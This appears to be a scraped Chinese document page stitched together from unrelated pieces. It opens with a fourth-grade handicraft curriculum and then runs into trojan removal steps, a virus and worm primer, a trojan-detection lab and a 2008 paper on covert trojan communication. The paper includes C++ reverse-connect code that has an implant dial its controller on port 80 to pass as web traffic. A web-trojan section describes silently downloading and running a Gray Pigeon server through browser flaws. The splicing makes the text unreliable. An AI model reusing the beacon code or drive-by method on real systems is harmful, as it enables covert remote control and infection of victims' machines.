《手工》校本课程计划与教案 授课教师:杨敏 授课对象:四年级学生 授课时间:每周五校本课程 手工方课程的开设是对课堂教学的补充和延伸,与课堂教学相比更具灵活性、可塑性,因而学生非常乐意参加。地方课程的开设,在于培养学生对美术的兴趣、爱好、增长知识、提高技能、丰富学生的课余文化生活,为今后培养美术人才起着积极推动的作用。现将本学期美术小组的活动安排制定如下: 一、活动目的 本学期开设的手工地方课程活动为一部分有特长爱好的学生提供一个展示个性才艺的机会和空间,使他们的一技之长得到充分的发挥和展示,以点带面,促进全校的美术活动。进一步了解美术的基本知识,提高学生的欣赏水平及创造能力。同时让学生在活动中体验创作的乐趣。 二、活动要求 1、组织学生按时参加活动,并保持室内清洁。 2、每周五下午第二节课开始活动,小组成员必须准时到达美术室。 3、美术小组成员应严格遵守纪律,不准在美术室大声喧哗,不准做与美术学习无关的事。 4、每次老师布置的作业,学生都应按时完成。 5、爱护美术教室内的设施和用品。 三、活动内容
1、以小组合作的形式进行平面剪贴和立体手工制作 2、卡纸和生活中的废旧物品均可作为创作材料 3、给学生自己创作作品的时间和空间。 4、欣赏优秀手工作品,开拓学生眼界。 5、及时用相机拍摄活动内容。(集体或个人) 四、定期举办美术比赛 举办美术展览,交流、回顾、总结学习成果,为同学们提供表现自己实力,增强自信心的舞台能起到意想不到的效果。教师要精心指导,严格把关。学生大胆构思,不拘一格,精心绘制,多出佳作,在校内展出以起到示范作用。 五、备注 附:教学进程和教案 博爱小学地方课程备课(填年度学期) 一、教学进程 有趣的吊饰 教学目标: 1、知识与技能:能表现物象的形态特征;运用剪、对折、粘贴制作吊饰;有目的的排列。 2、过程与方法: (1)在比较中,感受民间饰物造型、色彩、花纹特点; (2)在探索中学习吊饰的设计方法; (3)在“尝试运用”中掌握制作方法。
常见100种木马排除方法! 1.Acid Battery 打开注册表Regedit 点击目录至: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 删除右边的Explorer ="C:\WINDOWS\expiorer.exe" 关闭Regedit 重新启动到MSDOS方式 删除c:\windows\expiorer.exe木马程序 注意:不要删除正确的ExpLorer.exe程序,它们之间只有i与L的差别。 重新启动。 2.Acid Shiver 重新启动到MSDOS方式 删除C:\windows\MSGSVR16.EXE 然后回到Windows系统 打开注册表Regedit 点击目录至: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 删除右边的Explorer = "C:\WINDOWS\MSGSVR16.EXE" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 删除右边的Explorer = "C:\WINDOWS\MSGSVR16.EXE" 关闭Regedit 重新启动。 3.Ambush 打开注册表Regedit 点击目录至: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ 删除右边的zka = "zcn32.exe" 关闭Regedit 重新启动到MSDOS方式 删除C:\Windows\ zcn32.exe 重新启动。 4.AOL Trojan 启动到MSDOS方式 删除C:\ command.exe(删除前取消文件的隐含属性) 注意:不要删除真的https://www.doczj.com/doc/1f5745457.html,文件。 删除C:\ americ~1.0\buddyl~1.exe(删除前取消文件的隐含属性) 删除C:\ windows\system\norton~1\regist~1.exe(删除前取消文件的隐含属性) 打开WIN.INI文件
多媒体技术及其应用本栏目责任编辑:唐一东木马通信的隐蔽技术 张春诚,路刚,冯元 (解放军炮兵学院计算中心,安徽合肥230031) 摘要:服务器和客户机如何通信是木马研究的一个核心技术,该文讲述了如何利用网络协议躲避了防火墙和系统工具的检查,成功实现了木马的隐蔽通信,给出的源代码均调试通过。 关键词:木马通信;隐藏通信 中图分类号:TP393文献标识码:A 文章编号:1009-3044(2008)35-2481-03 Covert Technologies on Communications of Trojan Horse ZHANG Chun-cheng,LU Gang,FENG Yuan (PLA Artillery Academy Computer Center,Hefei 230031,China) Abstracr:The communications between server and client is a kernel technology to research Trojan.This paper describes how to hide out inspect of firewall and system tools through network protocol,and successful implement on covert communications of Trojan.These sound codes are all debugged and passed. Key words:communications of trojan horse;covert communications 1引言 木马通常需要利用一定的通信方式进行信息交流(如接收控制者的指令、向控制端传递信息等)。系统和应用程序一般采用TCP/UDP 通信端口的形式与控制端进行通信。木马一般也是利用TCP/UDP 端口与控制端进行通信。通常情况下,木马进行通信时直接打开一个或几个属于自己的TCP/UDP 端口。早期的木马在系统中运行后都是打开固定的端口,后来的木马在植入时可随机设定通信时打开的端口,具有了一定的随机性。可是通过端口扫描很容易发现这些可疑的通信端口。事实上,目前的许多木马检测软件正是通过扫描本地和远程主机系统中打开的已知木马端口进行木马检测的。木马通信端口成为暴露木马形踪一个很不安全的因素。为此采用新技术的木马对其通信形式进行了隐蔽和变通,使其很难被端口扫描发现。 2木马通信形式的隐蔽技术 木马为隐蔽通信形式所采用的手段有:端口寄生、反弹端口、潜伏技术,嗅探技术。 2.1端口寄生 端口寄生指木马寄生在系统中一个已经打开的通信端口,如TCP 80端口,木马平时只是监听此端口,遇到特殊的指令才进行解释执行。此时木马实际上是寄生在系统中已有的系统服务和应用程序之上的,因此,在扫描或查看系统中通信端口时是不会发现异常的。在Windows 9X 系统中进行此类操作相对比较简单,但是在Windows NT/2K 系统中实现端口寄生相对比较麻烦。在控制端与木马进行通信时,如木马所在目标系统有防火墙的保护,控制端向木马发起主动连接就有可能被过滤掉。 2.2反弹端口 反弹端口就是木马针对防火墙所采用的技术[1]。防火墙对于向内的链接进行非常严格的过滤,对于向外的连接比较信任。与一般的木马相反,反弹端口木马使用主动端口,控制端使用被动端口。木马定时监测控制端的存在,发现控制端上线,立即主动连接控制端打开的被动端口。为了隐蔽起见,控制端的被动端口一般开在TCP80。这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP USERIP :1026CONTROLLERIP :80ESTABLISHED 这种情况,用户可能误认为是自己在浏览网页。这种反弹端口的木马常常会采用固定IP 的第三方存储空间来进行控制端IP 地址的传递。 下面的代码演示了被控制端的客户套接字连接控制端的服务套接字。 CServerSocket *pMy;//CServerSocket 是CAsyncSocket 的派生类 …… //初始化是开始连接,同时建立定时器 BOOL CServiceDlg::OnInitDialog(){CDialog::OnInitDialog();pMy=NULL;SetTimer(199,30000,NULL);pMy=new MySock;pMy->Create();pMy->Connect(m_ip,80);//连接目标的80端口,让人感觉在上网 收稿日期:2008-07-02 作者简介:张春诚(1982-),男,硕士,研究方向:网络安全;路刚(1983-),男,硕士,研究方向:计算机人工智能;冯元(1983-),男,硕 士,研究方向:计算机网络技术。 ISSN 1009-3044 Computer Knowledge And Technology 电脑知识与技术 Vol.4,No.8,December 2008,pp.2481-2483E-mail:eduf@https://www.doczj.com/doc/1f5745457.html, https://www.doczj.com/doc/1f5745457.html, Tel:+86-551-569096356909642481
电脑病毒和木马的概念介绍 病毒、蠕虫和特洛伊木马是可导致您的计算机和计算机上的信息损坏的恶意程序。下面由我给你做出详细的!希望对你有帮助! : 什么是病毒: 计算机病毒(Computer Virus),根据《中华人民共和国计算机信息系统安全保护条例》,病毒的明确定义是"指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码"。 病毒必须满足两个条件: 条件1、它必须能自行执行。它通常将自己的代码置于另一个程序的执行路径中。 条件2、它必须能自我复制。例如,它可能用受病毒感染的文件副本替换其他可执行文件。病毒既可以感染桌面计算机也可以感染网络服务器。此外,病毒往往还具有很强的感染性,一定的潜伏性,特定的触发性和很大的破坏性等,由于计算机所具有的这些特点与生物学上的病毒有相似之处,因些人们才将这种恶意程序代码称之为"计算机病毒"。一些病毒被设计为通过损坏程序、删除文件或重新格式化硬盘来损坏计算机。有些病毒不损坏计算机,而只是复制自身,并通过显示文本、视频和音频消息表明它们的存在。即使是这些良性病毒也会给计算机用户带来问题。通常它们会占据合法程序使用的计算机内存。结果,会引起操作异常,甚至导致
系统崩溃。另外,许多病毒包含大量错误,这些错误可能导致系统崩溃和数据丢失。令人欣慰的是,在没有人员操作的情况下,一般的病毒不会自我传播,必须通过某个人共享文件或者发送电子邮件等方式才能将它一起移动。典型的病毒有黑色星期五病毒等。 什么是蠕虫: 蠕虫(worm)也可以算是病毒中的一种,但是它与普通病毒之间有着很大的区别。一般认为:蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性、隐蔽性、破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客技术相结合,等等。普通病毒需要传播受感染的驻留文件来进行复制,而蠕虫不使用驻留文件即可在系统之间进行自我复制,普通病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机。它能控制计算机上可以传输文件或信息的功能,一旦您的系统感染蠕虫,蠕虫即可自行传播,将自己从一台计算机复制到另一台计算机,更危险的是,它还可大量复制。因而在产生的破坏性上,蠕虫病毒也不是普通病毒所能比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造成网络瘫痪!局域网条件下的共享文件夹、电子邮件Email、网络中的恶意网页、大量存在着漏洞的服务器等,都成为蠕虫传播的良好途径,蠕虫病毒可以在几个小时内蔓延全球,而且蠕虫的主动攻击性和突然爆发性将使得人们手足无措。此外,蠕虫会消耗内存或网络带宽,从而可能导致计算机崩溃。而且它的传播不必通过"宿主"程序或文件,因此可潜入您的系统并允许其他人远程控制您的计算机,这也使它的危害
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中 “https://www.doczj.com/doc/1f5745457.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的
实验八木马病毒清除实验 1.实验目的 (1)熟悉BO2K木马的源代码。 (2)熟悉BO2K木马的原理和用法 2.实验所需条件和环境 1、硬件HPDX2358 2、Windows32操作系统,Visual Studio 7.0 编译环境 3.实验步骤 1、从随书资源目录\Experiment\Antitrojan\,文件为Antitrojan.sln为工程文件,使用 Antitrojan.exe观察效果。 2、设计思路:
1. 设计 1.1功能 本程序利用开放主机端口号和各个木马程序使用端口的对应关系,判断主机是否已中木马,中了何种木马(目前能查找一百余种),并能根据所中木马的类型,对其中的二十几种进行杀灭。此外,用户可自行追加数据库,增加能查找病毒的种类。 1.2程序流程 1.3核心数据结构 本程序的数据文件Trojan.txt使用了TROJAN结构来保存木马的名称,对应打开端口号和查杀代码: TROJAN: 字段名称字段类型字段说明 nPort 数字该木马所使用的端口号。 TroName 字符串该木马的名称。 nKillno 数字该木马的查杀号,杀除函数调用。 pnext 指针用于构成链表结构指针 在Trojan.txt中,每行为一个木马项,格式为 2. 关键技术 2.1技术背景 一般情况下,特定木马在运行时都会打开特定的端口和主控端进行通信,利用木马的这个特征,我们可以通过建立一个已知木马的名称和其使用端口的对应数据库来检测主机是否感染了木马,一旦得知了木马名称,就可以调用针对此木马的杀灭手段进行消除。本程序就是利用了木马这样的特性进行编写,在windows系统中,netstat命令可以很轻松的取得本地打开端口的列表,我们可以在程序中用system函数调用此命令,并读取保存的结果,就可以取得主机所有打开的端口(包括tcp和udp)。 对于杀除木马,通常通过以下一系列手段进行: 消灭主机中运行的木马进程。 消灭主机中存在的木马文件。 删除木马在主机注册表中添加的项。 删除木马在其他文件中添加的自启动项。 2.2技术细节 netstat命令有一个很强大的参数-a,使用了这个参数,我们可以获得主机所有开放的端口,包括tcp端口和udp端口,也包括活动的和非活动的端口。通过在VC中使用system("netstat -a >c:\\log.txt")函数,我们可以将netstat命令获得结果保存在c:\log.txt中,随即读取此文件,通过数据过滤,得到本地主机所有的开放端口。 在过滤log.txt数据的过程中,由于保存的格式都是: 所以我们要调用gethostbyaddr函数来获得主机名 返回的HOSTENT就包括主机名,当传入的地址是空指针时,函数就返回本地主机的名称。而当我们取得主机名后,就可以根据log.txt的格式获的各个打开得端口了。
引言 木马通常需要利用一定的通信方式进行信息交流(如接收控制者的指令、向控制端传递信息等)。系统和应用程序一般采用TCP/UDP通信端口的形式与控制端进行通信。木马一般也是利用TCP/UDP端口与控制端进行通信。通常情况下,木马进行通信时直接打开一个或几个属于自己的TCP/UDP端口。早期的木马在系统中运行后都是打开固定的端口,后来的木马在植入时可随机设定通信时打开的端口,具有了一定的随机性。可是通过端口扫描很容易发现这些可疑的通信端口。事实上,目前的许多木马检测软件正是通过扫描本地和远程主机系统中打开的已知木马端口进行木马检测的。木马通信端口成为暴露木马形踪一个很不安全的因素。为此采用新技术的木马对其通信形式进行了隐蔽和变通,使其很难被端口扫描发现。2木马通信形式的隐蔽技术 木马为隐蔽通信形式所采用的手段有:端口寄生、反弹端口、潜伏技术,嗅探技术。 2.1端口寄生 端口寄生指木马寄生在系统中一个已经打开的通信端口,如TCP80端口,木马平时只是监听此端口,遇到特殊的指令才进行解释执行。此时木马实际上是寄生在系统中已有的系统服务和应用程序之上的,因此,在扫描或查看系统中通信端口时是不会发现异常的。在Windows9X系统中进行此类操作相对比较简单,但是在WindowsNT/2K系统中实现端口寄生相对比较麻烦。在控制端与木马进行通信时,如木马所在目标系统有防火墙的保护,控制端向木马发起主动连接就有可能被过滤掉。 2.2反弹端口 反弹端口就是木马针对防火墙所采用的技术[1]。防火墙对于向内的链接进行非常严格的过滤,对于向外的连接比较信任。与一般的木马相反,反弹端口木马使用主动端口,控制端使用被动端口。木马定时监测控制端的存在,发现控制端上线,立即主动连接控制端打开的被动端口。为了隐蔽起见,控制端的被动端口一般开在TCP80。这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCPUSERIP:1026CONTROLLERIP:80ESTABLISHED这种情况,用户可能误认为是自己在浏览网页。这种反弹端口的木马常常会采用固定IP的第三方存储空间来进行控制端IP地址的传递。 下面的代码演示了被控制端的客户套接字连接控制端的服务套接字。CServerSocket*pMy;//CServerSocket是CAsyncSocket的派生类…… //初始化是开始连接,同时建立定时器 BOOLCServiceDlg::OnInitDialog(){ CDialog::OnInitDialog();pMy=NULL; SetTimer(199,30000,NULL);pMy=newMySock;pMy->Create(); pMy->Connect(m_ip,80);//连接目标的80端口,让人感觉在上网ComputerKnowledgeAndTechnology} //在定时器中检查是否有连接,否则试图重新连接V oidCServiceDlg::OnTimer(UINTnIDEvent){ If(nIDEvent=199){ If(pMy->Send(“test”,4)=SOCKET_ERROR){pMy->Detach();deletepMy;pMy=NULL; pMy=newMySock;pMy->Create(); pMy->Connect(m_ip,80);}} CDialog::OnTimer(nIDEvent);} 2.3潜伏技术 ICMP(互联网控制报文协议)是IP协议的附属协议,用来传递差错报文以及其他需要注意的消息报文。它是由内核或进程直接处理而不会打开通信端口。采用潜伏技术进行通信的木